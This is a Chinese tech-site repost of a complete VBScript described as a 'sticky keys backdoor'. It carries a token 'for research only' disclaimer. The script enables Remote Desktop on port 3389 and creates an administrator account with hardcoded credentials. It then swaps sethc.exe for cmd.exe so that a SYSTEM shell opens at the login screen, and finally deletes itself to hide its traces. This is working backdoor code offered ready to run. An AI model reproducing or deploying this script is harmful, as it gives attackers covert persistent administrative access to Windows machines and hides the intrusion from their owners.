扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
开启3389创建用户粘滞键后门,作研究使用,请勿违法
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者